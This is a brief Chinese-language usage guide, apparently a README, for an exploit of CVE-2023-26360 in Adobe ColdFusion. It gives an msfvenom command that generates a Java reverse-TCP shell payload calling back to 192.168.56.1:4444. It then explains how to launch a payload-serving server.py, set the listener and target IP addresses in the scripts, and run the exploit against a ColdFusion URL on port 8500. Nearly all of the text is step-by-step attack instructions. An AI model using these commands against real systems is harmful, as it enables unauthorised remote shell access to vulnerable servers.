有时,脚本在第一次尝试时不会生效。多试几次即可
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java
server.pycve.2023-26360.py 完成初始访问后,将载荷发送到 Coldfusion 服务器,因此需要先启动它。python3 server.py 8000
参数 8000 是服务器将监听的端口。
需要注意的是,第 12 行配置了服务器的 IP 地址,因此请修改它:
s.bind(('192.168.56.1',port))
cve-2023-26360.pypython3 cve-2023-26360.py 8000
与 server.py 一样,参数 8000 是 server.py 将监听的端口。因此,两条命令中的端口必须相同。
cve-2023-26360.py 中的第 8 行设置了 server.py 将监听的 IP 地址。必须正确配置它。
cve-2023-26360.py 中的第 11 行设置了 Coldfusion 服务器的 IP 地址,因此请修改它:
url = "http://192.168.56.102:8500"